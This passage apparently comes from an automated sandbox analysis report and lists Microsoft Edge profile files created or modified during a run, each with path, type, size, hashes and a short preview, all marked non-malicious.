                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                                        Entropy (8bit):5.095510111532203
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+untB1923oH+Tcwtk2WwnvB2KLlmF+mQq2P923oH+Tcwtk2WwnvIFUv:+MYebkxwnvFLXv4YebkxwnQFUv
                                                                                                                                                                                                                                                                        MD5:EC826CBCC31C8709B9870EF8574C7A9A
                                                                                                                                                                                                                                                                        SHA1:21114497CDC5FB9E05EF596E89E52FE3DC0EF018
                                                                                                                                                                                                                                                                        SHA-256:F38D10A892549C40FDD648EE803FA5AD3C563A98E7B1A79D4A9EDC03EFB8E3ED
                                                                                                                                                                                                                                                                        SHA-512:91AD5550EA40C6A537E590B13A098D252CF2A72492CFE7EDAAFE95928F57DDB842A66A3DE8141587E91233AFEC1EE11205F75957C9000BE54EB77616813D82DD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:37.275 2020 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-02:20:37.424 2020 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):358859
                                                                                                                                                                                                                                                                        Entropy (8bit):5.324605429065776
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfv7
                                                                                                                                                                                                                                                                        MD5:FA11AE4199032039FB1B7FDF6FCB21A2
                                                                                                                                                                                                                                                                        SHA1:2E7D98869F6C69CF230FB22F355624DD01264950
                                                                                                                                                                                                                                                                        SHA-256:4FA48321935EAF5A7FB8D9CF4ACEC5FCF3D9DF9B3E72A7A3F3DC030FD0565929
                                                                                                                                                                                                                                                                        SHA-512:3BAD367C976A3435125F321C8DC0F502D433D2733B7A11D871F9E15FA1EBF2EB9174BB1F5323B68AD17ABEFF29645133782E67CEEC131CFD3D854977E7ECFB39
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1502933673056654
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+sIq2P923oH+Tcwt8aPrqIFUt8PF+5FPZmw+PF+5FdkwO923oH+Tcwt8amLJ:Vv4YebL3FUt8Ml/+M35LYebQJ
                                                                                                                                                                                                                                                                        MD5:035620E26C293E8A13E1AFE67D75C431
                                                                                                                                                                                                                                                                        SHA1:EC1DEED9720FB7BA2F31429A9A1EF1F313AFE06F
                                                                                                                                                                                                                                                                        SHA-256:370EA3E243F111E26C7984CC80E19AB1BF3FA9D09B524F9A1DEA2D9E5FC42444
                                                                                                                                                                                                                                                                        SHA-512:30EC2752C1E166ED5EDCF30D20BF48EDFD81070D9495EE2522B5407E0A9B6A1F8916E25F648E19525E4F637BF902175E254EE84110F180632B196882A9AECB11
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.774 19f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-02:20:31.775 19f4 Recovering log #3.2024/12/27-02:20:31.775 19f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1502933673056654
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+sIq2P923oH+Tcwt8aPrqIFUt8PF+5FPZmw+PF+5FdkwO923oH+Tcwt8amLJ:Vv4YebL3FUt8Ml/+M35LYebQJ
                                                                                                                                                                                                                                                                        MD5:035620E26C293E8A13E1AFE67D75C431
                                                                                                                                                                                                                                                                        SHA1:EC1DEED9720FB7BA2F31429A9A1EF1F313AFE06F
                                                                                                                                                                                                                                                                        SHA-256:370EA3E243F111E26C7984CC80E19AB1BF3FA9D09B524F9A1DEA2D9E5FC42444
                                                                                                                                                                                                                                                                        SHA-512:30EC2752C1E166ED5EDCF30D20BF48EDFD81070D9495EE2522B5407E0A9B6A1F8916E25F648E19525E4F637BF902175E254EE84110F180632B196882A9AECB11
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.774 19f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-02:20:31.775 19f4 Recovering log #3.2024/12/27-02:20:31.775 19f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):5.161286350705174
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+m4q2P923oH+Tcwt865IFUt8PF+1F9ZZmw+PF+1F9zkwO923oH+Tcwt86+ULJ:Zv4Yeb/WFUt8ArZ/+Arz5LYeb/+SJ
                                                                                                                                                                                                                                                                        MD5:18E07BE91A060AA93A457D788ACF4AB0
                                                                                                                                                                                                                                                                        SHA1:1977744EFD1655FF16E9911A738A2AB292982A3E
                                                                                                                                                                                                                                                                        SHA-256:5ED18C05DCE7DD466FEF78F580479E45BD99952D2CBCE1B027BE158C9323E3A9
                                                                                                                                                                                                                                                                        SHA-512:7835055E3836CDB9C1ACD324BFC93B8C8DD4569081C54FB3FB303C853B3ACDB8E6FD4D27FBA632B6B3EED34FDC58C75B5E2A79EAA40F97A79701D9357FC0FEF6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.778 19f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-02:20:31.779 19f4 Recovering log #3.2024/12/27-02:20:31.779 19f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):5.161286350705174
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+m4q2P923oH+Tcwt865IFUt8PF+1F9ZZmw+PF+1F9zkwO923oH+Tcwt86+ULJ:Zv4Yeb/WFUt8ArZ/+Arz5LYeb/+SJ
                                                                                                                                                                                                                                                                        MD5:18E07BE91A060AA93A457D788ACF4AB0
                                                                                                                                                                                                                                                                        SHA1:1977744EFD1655FF16E9911A738A2AB292982A3E
                                                                                                                                                                                                                                                                        SHA-256:5ED18C05DCE7DD466FEF78F580479E45BD99952D2CBCE1B027BE158C9323E3A9
                                                                                                                                                                                                                                                                        SHA-512:7835055E3836CDB9C1ACD324BFC93B8C8DD4569081C54FB3FB303C853B3ACDB8E6FD4D27FBA632B6B3EED34FDC58C75B5E2A79EAA40F97A79701D9357FC0FEF6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.778 19f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-02:20:31.779 19f4 Recovering log #3.2024/12/27-02:20:31.779 19f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.111454688066266
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+ulcM+q2P923oH+Tcwt8NIFUt8PF+ulJZmw+PF+xjMVkwO923oH+Tcwt8+eLJ:icM+v4YebpFUt8LJ/+SjMV5LYebqJ
                                                                                                                                                                                                                                                                        MD5:C94D36494AA00C9DB555BADDDD142280
                                                                                                                                                                                                                                                                        SHA1:8A4005346DCC21CD42E3736E9A1CCC5ABB7442AE
                                                                                                                                                                                                                                                                        SHA-256:EB85CF03036501EF92293AF5D0C3C3D83D2F5537F86DB23DA2613314526AB528
                                                                                                                                                                                                                                                                        SHA-512:5EE81991F0315AD41BB4610F8AF801CBA9982C0F6136414030C5A8668172A1914AB489489081ECC7C86C0D6BE3F30867B2B3BB3BF6D8C374D844C3BD33F9AE27
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.521 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-02:20:32.521 138c Recovering log #3.2024/12/27-02:20:32.532 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.111454688066266
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+ulcM+q2P923oH+Tcwt8NIFUt8PF+ulJZmw+PF+xjMVkwO923oH+Tcwt8+eLJ:icM+v4YebpFUt8LJ/+SjMV5LYebqJ
                                                                                                                                                                                                                                                                        MD5:C94D36494AA00C9DB555BADDDD142280
                                                                                                                                                                                                                                                                        SHA1:8A4005346DCC21CD42E3736E9A1CCC5ABB7442AE
                                                                                                                                                                                                                                                                        SHA-256:EB85CF03036501EF92293AF5D0C3C3D83D2F5537F86DB23DA2613314526AB528
                                                                                                                                                                                                                                                                        SHA-512:5EE81991F0315AD41BB4610F8AF801CBA9982C0F6136414030C5A8668172A1914AB489489081ECC7C86C0D6BE3F30867B2B3BB3BF6D8C374D844C3BD33F9AE27
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.521 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-02:20:32.521 138c Recovering log #3.2024/12/27-02:20:32.532 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                                                                        Entropy (8bit):0.21917635620654863
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:SlRtFlljq7A/mhWJFuQ3yy7IOWU7dweytllrE9SFcTp4AGbNCV9RUI84n:WK75fORd0Xi99pEYe4n
                                                                                                                                                                                                                                                                        MD5:B1CD331ED2EFB7F72802E21E307735D3
                                                                                                                                                                                                                                                                        SHA1:B64B7450C5267C312BC3E2E5E8834B089A23D49A
                                                                                                                                                                                                                                                                        SHA-256:B8EECAB64F60E28897116FC84BE801CE8690437C261213F0BABF3F25FC2A2FD4
                                                                                                                                                                                                                                                                        SHA-512:9667B9DED67B69A336A12D9641CC0ABD721C8BAE7448DE1B4E47D2007A3382331B860AFB857E8C6984C50E9995422F62750152CB4D41571D53D32FD04023B230
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.............E`....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6481262007522295
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
                                                                                                                                                                                                                                                                        MD5:DF0D2FCFE368ECEEB78C13B004DAEDBD
                                                                                                                                                                                                                                                                        SHA1:1E9121546F3F0758130C2A37F274C56BCE00B702
                                                                                                                                                                                                                                                                        SHA-256:91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
                                                                                                                                                                                                                                                                        SHA-512:13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):405
                                                                                                                                                                                                                                                                        Entropy (8bit):5.240148151407293
                                                                                                                                                                                                                                                                        Encrypted:false
